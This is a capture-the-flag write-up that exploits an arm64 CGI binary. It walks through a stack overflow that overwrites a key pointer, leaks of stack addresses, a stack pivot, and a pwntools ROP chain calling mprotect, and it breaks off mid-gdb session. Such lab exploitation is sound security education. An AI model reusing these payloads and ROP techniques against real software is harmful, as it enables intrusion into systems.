ElBlo
[pwn] SRLabs CTF: baby arm
url: https://hackingchallenge.srlabs.de/challenges
Description
The challenge is served over a CGI-bin arm64 program. It’s a C program that parses the request body as key=value pairs. It then prints all the times name=something appear in the request body.
TL;DR (skip if you don’t want spoilers)
The key-value pairse are copied out from the buffer into two arrays (keys, values). You can exploit a buffer overflow the control where the key gets copied, but it has to be “close” in the stack. You also cannot write NUL
-bytes, nor &
, nor =
.
If you provide the maximum number of key-valye pairs (0x34), you will still have plenty of space on the buffer and the stack address will be leaked into x7
.
Using the buffer overflow, overwrite some values on the stack to make a rop chain to pivot the stack onto the value in x7
. From there, continue ropping until you get what you want.
Program Analysis.
main
disassembly
Disassembling the main
function with ghidra has some problems, so feel free to skip reading it.
int main(void) {
undefined *puVar1;
int cmp;
ssize_t read_n;
undefined8 unaff_x19;
char *keys;
undefined8 unaff_x20;
char *values_iter;
undefined8 unaff_x21;
undefined8 unaff_x22;
undefined8 unaff_x23;
undefined8 unaff_x24;
undefined8 unaff_x29;
undefined8 unaff_x30;
undefined auStack_60000 [393216];
bool found_name;
undefined *global_data;
char *values_start;
global_data = (undefined *)register0x00000008;
do {
puVar1 = global_data;
*(undefined8 *)(puVar1 + -0xfc00) = 0;
global_data = puVar1 + -0x10000;
} while (puVar1 + -0x10000 != auStack_60000);
*(undefined8 *)(puVar1 + -0x15950) = unaff_x29;
*(undefined8 *)(puVar1 + -0x15948) = unaff_x30;
*(undefined8 *)(puVar1 + -0x15940) = unaff_x19;
*(undefined8 *)(puVar1 + -0x15938) = unaff_x20;
*(long *)(puVar1 + 0x4fff8) = __stack_chk_guard;
read_n = read(0,puVar1 + 0x1d378,0x32c80);
puts("Content-type: text/html\n");
if ((int)read_n < 1) {
puts("<h1>Please provide your name with the name= parameter.</h1>");
}
else {
*(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
*(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
keys = puVar1 + -0x15908;
values_start = puVar1 + 0x3d38;
*(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
*(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
found_name = false;
parse_body(puVar1 + 0x1d378,keys,values_start,puVar1 + -0x1590c);
values_iter = values_start;
do {
while( true ) {
if (*keys == '\0') goto LAB_00400628;
cmp = strncmp(keys,"name",4);
if (cmp != 0) break;
keys = keys + 2000;
printf("<h1>Hello, %s!</h1>\n",values_iter);
values_iter = values_iter + 2000;
found_name = true;
if (keys == values_start) goto LAB_00400628;
}
keys = keys + 2000;
values_iter = values_iter + 2000;
} while (keys != values_start);
LAB_00400628:
if (found_name) {
unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
}
else {
puts("<h1>What is your name?</h1>");
unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
}
}
if (*(long *)(puVar1 + 0x4fff8) - __stack_chk_guard == 0) {
return 0;
}
*(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
*(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
*(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
*(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
/* WARNING: Subroutine does not return */
__stack_chk_fail(&__stack_chk_guard,0,puVar1 + 0x4e6b0,
*(long *)(puVar1 + 0x4fff8) - __stack_chk_guard);
}
- If you provide no input, it will print a message.
- There are three arrays,
keys
,values
, andread_buffer
.keys
comes first, with0x34
-2000 byte entries. Used to store the keys of the body.values
is next, with0x34
-2000 byte entries. Used to store the values associated with the keys.read_buffer
is where our input gets copied to, it has a size of0x32c80
bytes.
- After reading the input,
main
callsparse_body
, passing the three arrays. - When that’s done,
main
will iterate overkeys
andvalues
, and print all the values whose key hasname
as a prefix. - At the end, if no name was printed, the program will print
<h1>What is your name?<h1>
.
Now, let’s look at parse_body
.
parse_body
disassembly
void parse_body(char* body,char* keys,char *values, undefined4* param_4) {
char* src;
size_t len;
long i;
int count;
char* saveptr = NULL;
char* kv_ptr = NULL;
char[32] dst = {0};
char* key_ptr = NULL;
char* value_ptr = NULL;
uint64_t stack_canary = __stack_chk_guard;
char c;
src = strtok_r(body, "&", &saveptr);
if (src == NULL) {
*param_4 = 0xffffffff;
kv_ptr = NULL;
} else {
count = 0;
do {
kv_ptr = src;
key_ptr = keys;
value_ptr = values;
len = simd_strlen(src);
// This can overflow dst and overwrite key_ptr and value_ptr
strncpy(&dst, src, len & 0xffffffff);
i = 0;
do {
// Copy key into key_ptr (points to keys)
c = src[i];
if (c == '=' || c == '\0') break;
key_ptr[i] = c;
i += 1;
src = kv_ptr;
} while (i != 2000);
// Copy value into value_ptr (points to values)
kv_ptr = strchr(&dst, L'=');
if (kv_ptr != NULL) {
strncpy(value_ptr, kv_ptr + 1, 2000);
value_ptr[1999] = '\0';
}
count += 1;
src = strtok_r(NULL, "&", &saveptr);
keys = keys + 2000;
values = values + 2000;
kv_ptr = src;
} while (count != 0x34 && src != NULL);
}
if (stack_canary - __stack_chk_guard == 0) {
return;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail(&__stack_chk_guard,0,stack_canary - __stack_chk_guard);
}
- The function
parse_body
is in charge of parsing the input buffer into the key-value pair arrays.- It uses
strtok_r
to tokenize the&
chars. - Every time it sees an
&
, it will:- Copy the address of the current keys and values pointer into the stack (
key_ptr
andvalue_ptr
). - Copies from the current the data from the read buffer until the found
&
into a stack buffer (dst
). - Copy from the read buffer into the address pointed to by
key_ptr
, until it either finds a NUL-byte or an=
. - Look for a
=
in thedst
buffer andstrncpy
from that position into thevalue_buf
, up to 2000 chars. - Note that both
key_ptr
andvalue_ptr
can be overwritten if our input is too long.
- Copy the address of the current keys and values pointer into the stack (
- This is repeated 0x34 times, or until we don’t have any more
&
characters.
- It uses
Other details
- The binary is not PIE. It is always loaded at the same address, but the stack is randomized.
- We have some control over the environment variables, for example, the user agent that we set in our request will end up as an env var.
- The
read
call for reading the request body is very large, but in reality we will only be able to read ~32k bytes. - There’s a limit of 0x34 key-value pairs that will be processed.
Exploit Ideas
With all these details, an idea of a possible attack would be to use the write-what-where primitive to change some of the return addresses to start ropping, and then pivot our stack to the read_buffer
to do a longer rop-chain. Sadly, our read_buffer
is too far away from where key_ptr
points to, we will need to figure out a way to work around that.
Another challenge is that, on each iteration of the loop in parse_body
, the key and value ptrs increment by 2000, so the pointer that we are modifying keeps changing.
Let’s set up everything so we can start playing with this challenge :)
Remote Setup, with requests library.
Trying this challenge is super easy, we just need to make a simple web request:
import requests
def run_remote(payload):
url = 'http://5.75.229.171:1337/cgi-bin/pwn.cgi'
return requests.post(url, data=payload).content
>>> run_remote(b'name=test')
b'<h1>Hello, test!</h1>\n'
You can also change the request headers, but this seems to be good enough for now.
Local Setup with usermode QEMU.
Given that I don’t have an arm64 machine, the easiest way to study the binary locally is to use usermode QEMU. This is a QEMU mode in which userspace code gets emulated, while kernel code gets routed to the real linux kernel.
Note that usermode QEMU doesn’t provide a security boundary or isolation in any way. Don’t use it to run untrusted binaries.
~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 pwn.cgi
Content-type: text/html
<h1>Hello, test!</h1>
Limitations
Note that this setup has various limitations:
-
It doesn’t seem to have
aslr
, which causes the stack to be alwas in the same place.- This can be helpful to iterate fast and get an exploit working, but our solution needs to work with aslr eventually.
- Note that we can simulate some randomness by messing with environment variables when we start the program.
-
The memory mappings might not be the same ones as in the real program. QEMU doesn’t provide an easy way of printing the memory mappings either.
- One option that I found useful was to check
/proc/pid/maps
on the QEMU process: the program was loaded on the lower end of the address space. - Some failures might not show up correctly. For example, if the program tries to write outside of the low-memory area, it might cause issues with QEMU or might not be reported correctly.
- One option that I found useful was to check
-
This is not the same setup as with the CGI-bin script.
- Our input is actually an HTTP request. We have control over some headers that end up in the environment variables.
- The output of the program must start with a content type header:
Content-Type: text/plain\n\n
. - Apache reads our entire request on one go and sends it to the program.
- For example, one way to defeat aslr, could be to make the program print a stack address, and then overide a return address to execute
main
again, causing it toread
our input again, with the same memory layout. This wouldn’t work on a CGI-Bin script.
- For example, one way to defeat aslr, could be to make the program print a stack address, and then overide a return address to execute
strace
Usermode QEMU also has an option for logging the system calls:
~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 -strace pwn.cgi
10903 brk(NULL) = 0x000000000049a000
10903 brk(0x000000000049ab78) = 0x000000000049ab78
10903 set_tid_address(4825296,4821024,4825280,4825536,4778064,4827120) = 10903
10903 set_robust_list(4825312,24,4825312,1,0,4825360) = -1 errno=38 (Function not implemented)
10903 Unknown syscall 293
10903 uname(0x5500800078) = 0
10903 prlimit64(0,3,0,365080609256,4827160,88) = 0
10903 readlinkat(AT_FDCWD,"/proc/self/exe",0x00000055007ff130,4096) = 38
10903 getrandom(4820672,8,1,4825088,4786664,0) = 8
10903 brk(0x00000000004bbb78) = 0x00000000004bbb78
10903 brk(0x00000000004bc000) = 0x00000000004bc000
10903 mprotect(0x000000000048e000,16384,PROT_READ) = 0
10903 read(0,0x7cd468,208000) = 9
10903 newfstatat(1,"",0x000000550079a638,0x1000) = 0
Content-type: text/html
10903 write(1,0x49b020,24) = 24
10903 write(1,0x49b020,1) = 1
<h1>Hello, test!</h1>
10903 write(1,0x49b020,22) = 22
10903 exit_group(0)
gdb
Another good thing about usermode qemu: it lets us hook a debugger to our process.
Make sure you have gdb-multiarch installed
$ sudo apt install gdb-multiarch
Launch qemu with the gdb flag:
$ echo -n "name=marco" | env -i qemu-aarch64 -g 1234 ./pwn.cgi
And then launch gdb and connect to it:
$ gdb-multiarch ./pwn.cgi
...
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c
pwntools
Using pwntools to work on the exploit will be a real time saver.
Given that our payload cannot be dynamic, the setup to run it with pwntools is easy:
$ python3 pip install pwntools
import pwn
pwn.context.update(arch='aarch64', os='linux')
pwn.context.log_level = 'critical'
def run(payload):
with pwn.process(['qemu-aarch64', './pwn.cgi'], env={}) as target:
target.send(payload)
return target.recvall()
def run_with_strace(payload):
with pwn.process(['qemu-aarch64', '-strace', './pwn.cgi'], env={}) as target:
target.send(payload)
return target.recvall()
def run_with_gdb(payload):
with pwn.process(['qemu-aarch64', '-g', '1234', './pwn.cgi'], env={}) as target:
target.send(payload)
return target.recvall()
Improving our understanding of the problem
We have decompiled the program, have a reasonable understanding of how it works, and have the tools to play with it locally. Let’s see what we can learn about it.
Confirming the dst
buffer size.
First, let’s double check the size of the dst
buffer in parse_body
:
>>> from pwnlib.util.cyclic import cyclic, cyclic_find
>>> print(run(b'name=' + cyclic(10)).decode())
Content-type: text/html
<h1>Hello, aaaabaaaca!</h1>
>>> print(run(b'name=' + cyclic(100)).decode())
Content-type: text/html
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Let’s see with strace:
>>> print(run_with_strace(b'name=' + cyclic(100)).decode())
(...)
11337 write(1,0x49b020,24) = 24
11337 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=NULL} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Sadly, this is one of the issues I mentioned earlier about usermode QEMU: the segmentation fault is happening in a memory region outside the program allowed adress space, and QEMU is not reporting it. Let’s shrink our payload until see a crashing address:
>>> print(run_with_strace(b'name=' + cyclic(34)).decode())
(...)
Content-type: text/html
11354 write(1,0x49b020,24) = 24
11354 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x0000696161616861} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
With the address, we can now get the offset:
>>> >>> pwn.p64(0x0000696161616861)
b'ahaaai\x00\x00'
>>> cyclic_find(b'ahaaai\x00\x00')
27
This means that our buffer has a size of 27+5 = 32 bytes. ✅︎
Print the keys pointers.
From reading the decompiled source code, we know that it will write the keys from src
and the values from the dst
buffer after the first =
, with a strncpy
. In our dst
buffer, there are no NUL
-bytes getting copied (you copy everything until a NUL
-byte or a &
), so if we end up key-value pair in 32 bytes, we should get that copied + whatever is after until a NUL
-byte into the values array. Furthermore, if we use name
as the key, it will be printed out by the program at the end.
This is the code I am talking about:
// Copy value into value_ptr (points to values)
kv_ptr = strchr(&dst, L'=');
if (kv_ptr != NULL) {
strncpy(value_ptr, kv_ptr + 1, 2000);
value_ptr[1999] = '\0';
}
Let’s see what happens:
>>> run(b'name=' + b'a' * (32-5))
b'Content-type: text/html\n\n<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xb3y!</h1>\n'
>>> x = b'\xb8\xb3y' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
'0x79b3b8'
After our name (all a’s), there’s some extra bytes. Those would be the keys_ptr
value until the first NUL
-byte. QEMU usermode places the stack at 0x5500aabbcc
, so we only see the last 3 digits. If we run it against the real website, we get a better value.
>>> run_remote(b'name=' + b'a' * (32-5))
b'<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xe0d\xc5\xff\xff!</h1>\n'
>>> x = b'\xb8\xe0d\xc5\xff\xff' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
0xffffc564e0b8
Note that we can use the same name
multiple times, and thus, leak all the addresses from the keys array:
def leak_keys_addresses():
payload = b'name=' + bytearray(b'a')*27
payloads = [payload]*0x35 # one more for good measure.
payload = b'&'.join(payloads)
response = run(payload).content
for line in response.split(b'\n'):
if not b'aaaaaaaaaaaaaaaaaaaaaaaaaaa' in line: continue
if len(line) == 0: continue
line = line[38:-6] # Take out the prefix and these 6 chars: !</h1>
ptr = line + b'\x00'*8
ptr = pwn.u64(ptr[:8])
print(hex(ptr))
>>> leak_keys_addresses()
0x79b3b8
0x79bb88
0x79c358
(...)
0x7b3a58
0x7b4228
And we can see that each of them is 2000 bytes apart:
>>> 0x79bb88 - 0x79b3b8
2000
✅︎
Analyzing the memory layout with gdb.
We can launch gdb and stop at the beginning of parse_body
to analyze the parameters.
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b parse_body
Breakpoint 1 at 0x400868
(gdb) c
Continuing.
Breakpoint 1, 0x0000000000400868 in parse_body ()
(gdb) p /x $x0
$1 = 0x55007ce038
(gdb) p /x $x1
$2 = 0x550079b3b8
(gdb) p /x $x2
$3 = 0x55007b49f8
(gdb) p /x $x3
$4 = 0x550079b3b4
(gdb) p /x $sp
$5 = 0x550079b2d0
x0
is our read buffer.
x1
is the beginning of the keys
array.
x2
is the beginning of the values
array.
I am not clear on what x3
is used for.
(gdb) p /x $x1 + (2000 * 0x34)
$6 = 0x55007b49f8
(gdb) p /x $x2 + (2000 * 0x34)
$7 = 0x55007ce038
Also, at the end of the keys
array, is the values
array, and the end of that, it’s the input buffer.
This is the code at the beginning of parse_body
:
(gdb) x /20i parse_body
0x400860 <parse_body>: stp x29, x30, [sp, #-160]!
0x400864 <parse_body+4>: adrp x4, 0x491000 <tunable_list+1320>
=> 0x400868 <parse_body+8>: movi v0.4s, #0x0
0x40086c <parse_body+12>: mov x29, sp
The stack takes 160 bytes, and x29
and x30
are stored on top.
Something that also interests us, is the function epilogue, to see how the values from the stack are restored and what we have control over.
0x400998 <parse_body+312>: ldp x19, x20, [sp, #16]
0x40099c <parse_body+316>: ldp x21, x22, [sp, #32]
0x4009a0 <parse_body+320>: ldp x23, x24, [sp, #48]
0x4009a4 <parse_body+324>: ldp x29, x30, [sp], #160
0x4009a8 <parse_body+328>: ret
To get a complete view, let’s set a breakpoint in the middle of the function and analyze the stack.
(gdb) x /20i $pc
=> 0x4008f4 <parse_body+148>: ldr x1, [sp, #136]
0x4008f8 <parse_body+152>: strb w0, [x1, x2]
0x4008fc <parse_body+156>: add x2, x2, #0x1
0x400900 <parse_body+160>: cmp x2, #0x7d0
This is where we store the c
character from the key into the value pointed by key_ptr
, which lives in sp + 136 (0x88)
Now, let’s print the stack contents (with some notes):
(gdb) x /40gx $sp
0x550079b2d0: 0x000000550079b370 0x00000000004005d8 x29, x30
0x550079b2e0: 0x000000550079b3b8 0x00000055007b49f8 x19, x20
0x550079b2f0: 0x0000000000458270 0x00000055007b49f8 x21, x22
0x550079b300: 0x0000000000458278 0x0000000000000000 x23, x24
0x550079b310: 0x0000000000000018 0x00000000004925c8
0x550079b320: 0x0000000000493c30 0x00000055007ce042
0x550079b330: 0x00000055007ce038 0x72616d3d656d616e dst
0x550079b340: 0x0000000000006f63 0x0000000000000000
0x550079b350: 0x0000000000000000 0x000000550079b3b8 keys_ptr (sp + 0x88)
0x550079b360: 0x00000055007b49f8 0xa36829a47092db00 values_ptr, stack canary
0x550079b370: 0x0000005500800cc0 0x0000000000400a64 main's stack.
Exploiting the buffer overflow (no aslr)
In this run, the value of keys_ptr
is 0x550079b3b8
, and parse_body
’s return address is stored in 0x550079b2d8
.
This means that if we can overwrite the first two bytes of keys_ptr
with b2d8
, we should be able to jump to wherever we want.
At the beginning of the main function, there’s a call to puts at address 0x400684
:
if (read_bytes < 1) {
puts("<h1>Please provide your name with the name= parameter.</h1>");
}
Remember: we need to provide a key=value
pair, the value in the key
will be copied to where keys_ptr
is pointing, and we can overwrite it by providing a long value
.
Here we want the key
to be 0x400684
, and the value to overflow the first two bytes of keys_ptr
with b2d8
.
>>> payload = b'\x84\x06\x40=' + b'a' * 28 + b'\xd8\xb2'
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'
Success! ✅︎
Note that we had to guess two bytes to put in the keys_ptr
address. This will be problematic when we have to deal with aslr. But let’s ignore the elephant in the room for a while, and let’s think about how to exploit this issue.
We can see that if we can modify the x30
register on the stack, we can also modify the other registers (x19
…x24
, x29
), and almost everything that is “close” in the stack, like main’s return address.
Stack Pivot
We also have a buffer in memory with arbitrary data. If we could pivot the stack to our buffer, we can chain any number of rop gadgets and take over from there.
Using ropper to find gadgets
There are a lot of tools to search for rop gadgets, let’s use ropper.
$ python3 pip install ropper
$ ropper -f pwn.cgi --search "mov sp"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov sp
[INFO] File: pwn.cgi
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000040e408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x60; ret;
0x0000000000448d74: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
0x0000000000441adc: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldr x23, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000044aed8: mov sp, x29; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
(Side note and useful tip, %
works as a wildcard, and ?
works as a single-character wildcard).
All of the gadgets mov from x29
, to sp
, so we need to modify the value of x29
in memory.
From those gadgets, the first one is the one that gives us the most control (less stack usage, and most registers loaded)
So let’s pick that one (address 0x440408
), and overwrite x30
with it, and put our read address in x29
.
The addresses that we want to change are 0xb2d8
and 0xb2d0
, respectively.
Now, we know that our read buffer is at 0x55007ce038
, and the value stored for x29
is 0x550079b370
, so we need to change 3 bytes in total.
We also need to figure out what to put there. We can pad the message with 0s just so the calculations are easier. We could also use a rop sled such that no matter where we fall, we will eventually rop our way towards our destination.
Keep in mind that in aarch64
, the stack pointer must be aligned to 16 bytes.
>>> hex(0x55007ce038 + 0x58)
'0x55007ce090'
def rop():
keyvals = [
b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
]
payload = b'&'.join(keyvals)
payload += b'\x00' * (0x58 - len(payload))
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
rop.raw(0xdeadbeef) # x29
rop.raw(0x00400684) # x30
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(0xdeadbeef) # x23
rop.raw(0xdeadbeef) # x24
payload += rop.chain()
return payload
>>> payload = rop()
>>> payload
b'\x08\x04D=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd8\xb2&\x90\xe0|=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd0\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\x84\x06@\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00'
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\nqemu: uncaught target signal 11 (Segmentation fault) - core dumped\n'
The address of the function to print the string was only present in our buffer, well after the end of the initial payload. This means that we were succesful in doing a stack pivot and executing from there.
Building a rop-chain
Now that we can execute stuff out off our buffer, we can start building a rop chain that allows us to execute arbitrary code. Ideally, we would just want to open the flag and print it, but it seems easier to first add a bit more flexibility by allowing for arbitrary code execution.
Some alternatives:
mprotect
our own stack mapping, allowing for RWX permissions.mprotect
the binary’s mappings, allowing for RWX permissions + copying our code there.mmap
something new, and copying our code there.
It all depends on what rop gadgets we can find. To me it was easier to go with the second option, so let’s go with that.
Making Linux system calls in aarch64
requires us to set the system call number in x8
and issue an svc #0
instruction.
Here is one rop gadget with: svc #0
:
$ ropper -f pwn.cgi --search "svc #0"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: svc #0
[INFO] File: pwn.cgi
0x000000000041f45c: svc #0; cmn w0, #1, lsl #12; b.hi #0x1f470; mov w0, #0; ret;
0x000000000041f388: svc #0; cmn x0, #0xfff; b.hs #0x1f398; ret;
(...)
0x00000000004138e0: svc #0; ret;
We can also call mprotect
directly, as it is in our binary:
(gdb) x /10i mprotect
0x420440 <mprotect>: nop
0x420444 <mprotect+4>: mov x8, #0xe2 // #226
0x420448 <mprotect+8>: svc #0x0
0x42044c <mprotect+12>: cmn x0, #0xfff
0x420450 <mprotect+16>: b.cs 0x420458 <mprotect+24> // b.hs, b.nlast
0x420454 <mprotect+20>: ret
0x420458 <mprotect+24>: b 0x424900 <__syscall_error>
Which should save us from having to look up one extra gadget.
Return to x30
In aarch64
, ret
doesn’t pop up anything from the stack, instead the processor jumps to whatever is in the x30
register. So we need to take that into account when looking for gadgets.
Some of the gadgets will do ldp x29, x30, [sp], #something, ..., ret
, meaning that they will load x30
from the stack, advance the stack, and then return to x30
. If after that one, we use a gadget with a simple ret
, like the one above, we will end up in an infinite loop (x30
will not be changing).
One option is to use a gadget that branches using another register (only br
, as blr
also sets the link register).
The idea to execute ret
-only gadgets would be to find a gadget that does:
ldp
/ldr
xN, [sp, #k]
ldp x29, x30, [sp], #something
br xN
We don’t really care about the order of the first two, though. I used the following query in ropper
to find one such gadget:
$ ropper -f pwn.cgi --search "%ldp x29, x30%br"
(...)
0x000000000042b788: ldr x16, [sp, #0x60]; ldp x0, x1, [sp, #0x90]; ldp x29, x30, [sp], #0x100; br x16;
0x0000000000427d0c: ldr x16, [sp, #0x60]; ldp x1, x0, [sp, #0x78]; ldp x29, x30, [sp], #0xb0; br x16;
0x000000000042988c: ldr x16, [sp, #0x60]; ldp x29, x30, [sp], #0xf0; br x16;
(...)
Let’s take a look at the second one:
0x0000000000427d0c:
ldr x16, [sp, #0x60];
ldp x1, x0, [sp, #0x78];
ldp x29, x30, [sp], #0xb0;
br x16;
- Load
x16
from the stack (sp + 0x60
) ✓ - Load
x0
,x1
from the stack (sp + 0x78
,sp + 0x80
) ✓ - Load
x29
,x30
from the stack and advance it by0xb0
✓ - Branch to
x16
✓
So we can put the address of mprotect
in x16, the first two arguments in x0
, and x1
, and then the address of the next gadget in x30
.
Calling mprotect
Finding an x2
-load gadget.
We have found a gadget that allows us to call mprotect
with custom values of x0
, and x1
. Remember that mprotect
takes three parameters:
int mprotect(void* addr, size_t size, int flags)
So we need a gadget that sets x2
with the flags that we want (PROT_READ|PROT_WRITE|PROT_EXEC
). Again, we have multiple options:
-
Find a gadget that sets that specific constant in
x2
. -
Find a gadget that loads a value into
x2
from the stack. -
Mov from a previously controlled register into
x2
.
The queries for the first two options didn’t yield anything useful:
$ ropper -f pwn.cgi --search "mov x2, #"
$ ropper -f pwn.cgi --search "ldr x2,"
But the last one did:
$ ropper -f pwn.cgi --search "mov x2, x%"
(...)
0x00000000004057dc: mov x2, x23; mov x1, x27; mov x0, x26; blr x24;
(...)
This gadget will:
- Move x23 into x2 (we control x23, as it was picked up from the stack). ✓
- Move x27 into x1 (we don’t care, as we will overwrite it).
- Move x26 into x0 (we don’t care, as we will overwrite it).
- Branch with link into x24 (we control x24, as it was picked up from the stack). ✓
Testing the partial chain
So now we can do:
- Stack pivot gadget, setting:
x30
(sp + 0x08
) tox2
-load gadget address (0x4057dc
).x23
(sp + 0x30
) toPROT_READ|PROT_WRITE|PROT_EXEC
.x24
(sp + 0x38
) tox16
-branch gadget address (0x427d0c
).
x2
-load gadget. No stack usage.x16
-branch gadget address, setting:
x16
(sp + 0x60
) tomprotect
.x1
(sp + 0x78
) to the mapping address.x2
(sp + 0x80
) to the mapping size.x30
(sp + 0x08
) to the address of the next gadget (print address).- Some extra data to fill the stack (the gadget advances the stack by
0xb0
bytes).
Which address do we want to mprotect
? Well, let’s see which mappings are available.
$ readelf -Wl ./pwn.cgi
Elf file type is EXEC (Executable file)
Entry point 0x400700
There are 6 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x07de74 0x07de74 R E 0x10000
LOAD 0x07e830 0x000000000048e830 0x000000000048e830 0x0057f8 0x00ae98 RW 0x10000
NOTE 0x000190 0x0000000000400190 0x0000000000400190 0x000044 0x000044 R 0x4
TLS 0x07e830 0x000000000048e830 0x000000000048e830 0x000020 0x000068 R 0x8
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
GNU_RELRO 0x07e830 0x000000000048e830 0x000000000048e830 0x0037d0 0x0037d0 R 0x1
We can pick the last page of the executable code, hoping that it will not collide with any code.
So mapping_addr = 0x47d000
, mprotect_size = 0x1000
.
import mmap
def rop():
keyvals = [
b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
]
payload = b'&'.join(keyvals)
payload += b'\x00' * (0x58 - len(payload))
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
mprotect_addr = 0x420440
mapping_addr = 0x47d000
mprotect_size = 0x1000
mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
rop.raw(0xdeadbeef) # x29
rop.raw(0x4057dc) # x30, x2-load gadget
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
rop.raw(0x427d0c) # x24, x16-branch gadget
"""
The x2-load gadget doesn't touch the stack.
It will branch to x24, x16-branch gadget.
0x4057dc:
mov x2, x23;
mov x1, x27;
mov x0, x26;
blr x24;
"""
"""
The x16-branch gadget, loads x16, x1, x0, x29 and x39 from
the stack, advances the stack and branches to x16.
0x427d0c:
ldr x16, [sp, #0x60];
ldp x1, x0, [sp, #0x78];
ldp x29, x30, [sp], #0xb0;
br x16;
"""
rop.raw(0xdeadbeef) # x29
rop.raw(0x00400684) # x30, puts function.
for i in range((0x60-0x10)//8):
rop.raw(0xdeadbeef) # filling until 0x60
rop.raw(mprotect_addr) # sp + 0x60
rop.raw(0xdeadbeef) # sp + 0x68
rop.raw(0xdeadbeef) # sp + 0x70
rop.raw(mprotect_size) # sp + 0x78 x1, size
rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
for i in range((0xb0 - 0x88)//8):
rop.raw(0xdeadbeef) # Filling until 0xb0.
payload += rop.chain()
return payload
We can follow along with gdb!
>>> payload = rop()
>>> run_with_gdb(payload)
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b *0x400998
Breakpoint 5 at 0x400998
(gdb) c
Continuing.
Breakpoint 5, 0x0000000000400998 in parse_body ()
(gdb) x /20i $pc
=> 0x400998 <parse_body+312>: ldp x19, x20, [sp, #16]
0x40099c <parse_body+316>: ldp x21, x22, [sp, #32]
0x4009a0 <parse_body+320>: ldp x23, x24, [sp, #48]
0x4009a4 <parse_body+324>: ldp x29, x30, [sp], #160
0x4009a8 <parse_body+328>: ret
(gdb) x /2gx $sp
0x550079b2d0: 0x00000055007ce090 0x0000000000440408
We can see that x29 and x30 will take our buffer addr and the stack pivot gadget address. After a few more instructions, we execute the ret:
(gdb) si
